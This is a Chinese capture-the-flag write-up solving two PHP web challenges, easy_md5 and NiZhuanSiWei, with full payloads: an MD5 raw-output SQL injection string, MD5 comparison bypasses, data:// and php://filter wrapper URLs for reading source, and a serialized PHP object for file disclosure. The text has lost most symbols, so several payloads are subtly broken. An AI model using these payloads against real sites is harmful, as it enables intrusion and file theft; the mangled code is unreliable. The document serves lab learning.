网站树状结构图怎么做,为什么不用h5做网站,品牌网站的建设,廊坊网站建设冀icp备目录 [BJDCTF 2020]easy_md5
1、知识点
2、题目
3、思路
[ZJCTF 2019]NiZhuanSiWei
1、知识点
2、题目
3、思路
第一层
第二层
第三层 [BJDCTF 2020]easy_md5
1、知识点
弱比较#xff0c;强比较、数组绕过、MD5加密
2、题目 3、思路
1、首先我们跟着题目输入强比较、数组绕过、MD5加密
2、题目 3、思路
1、首先我们跟着题目输入看看有没有内容 页面没有任何显示源代码也没有隐藏信息
2、使用BP抓包 发现这里有隐藏信息 hint: select * from admin where passwordmd5($pass,true) md5($pass,true)是什么意思呢 TRUE就是将字符串编码城16字符的二进制模式
FALSE就是我们常见的md5编码方式
这里的password的值就是我们可以输入的值那我们要怎么绕过呢
可以拼接一个or语句也就是我们要输入的内容为or...
查找网上的wp知道 字符串ffifdyop 经过MD5的16进制格式编码后为 or6]!r,b 2、所以我们输入这个字符串结果跳到下个界面 我们查看网站源码发现有一串代码 这个代码的意思是用get方式输入a和ba的值不等于b的值是弱比较a和b两个值的md5值相等这里我们可以找两个值的md5值一样的可以绕过也可以采用数组方式 是赋值 是弱比较 是强比较 ?as878926199abs155964671a ?a[]1b[]2 3、进入下个界面
这里的源码意思是Post方式传入两个参数值相同类型也需要相同所以只能使用数组绕过 param1[]1param2[]2 这里就得到flag啦 NSSCTF{326018f0-b4cb-4302-a24e-d7cf9173e035} [ZJCTF 2019]NiZhuanSiWei
1、知识点
php序列化php伪协议
2、题目 3、思路 打开题目我们可以得到源代码
题目提示我们要用GET方式输入三个参数的值这里套了三层我们逐层破解
第一层 这里的代码意思是要我们上传一个名字为text文件内容为welcome to the zjctf的文件
file_get_contents()函数就是读取文件的函数用法如下 那问题来了这里又没有文件上传的方式要怎么上传呢
这里就需要使用php的伪协议了 这里可以使用php://input将参数传进去也可以使用data://
注意php://input 需要使用POST方式上传数据 使用data://
http://node4.anna.nssctf.cn:28444/?textdata://text/plain,welcome to the zjctf 注意使用data://有时需要将数据进行base64编码不过这一题并不用
这样子就绕过了第一层接着来第二层
第二层 这里提示有一个useless.php界面我们访问一下看看 这里直接访问是访问不出什么内容的需要使用php://filter这个伪协议来读取
http://node4.anna.nssctf.cn:28462/?textdata://text/plain,welcome to the zjctffilephp://filter/readconvert.base64-encode/resourceuseless.php 得到一串base64编码的字符串我们进行解码 这里又得到代码根据代码我们可以知道跟flag有关源代码是定义了一个类但没有实例化我们将代码进行修改接下来就是第三层
第三层 这里的数据需要反序列后才会输出所以我们输入的数据必须是序列化的根据第二层得到的代码我们进行修改
?php class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this-file)){ echo file_get_contents($this-file); echo br;return (U R SO CLOSE !///COME ON PLZ);} }
}
#实例化这一个类
$flagnew Flag();
#将数据进行序列化
echo serialize($flag);
?
将代码在本地的靶场运行我这边是在pikachu的靶机上运行结果为 根据第二层的源码我们得知有一个flag.php文件
所以我们将序列化的内容改一下然后传给参数password
O:4:Flag:1:{s:4:file;s:8:flag.php;}
http://node4.anna.nssctf.cn:28462/?textdata://text/plain,welcome to the zjctffileuseless.phppasswordO:4:Flag:1:{s:4:file;s:8:flag.php;} 查看网站源代码就得到了flag NSSCTF{0f40c6f4-45e1-4bee-ac5a-db46758135d6} 这篇文章就先写到这里了哪里不足的欢迎批评指正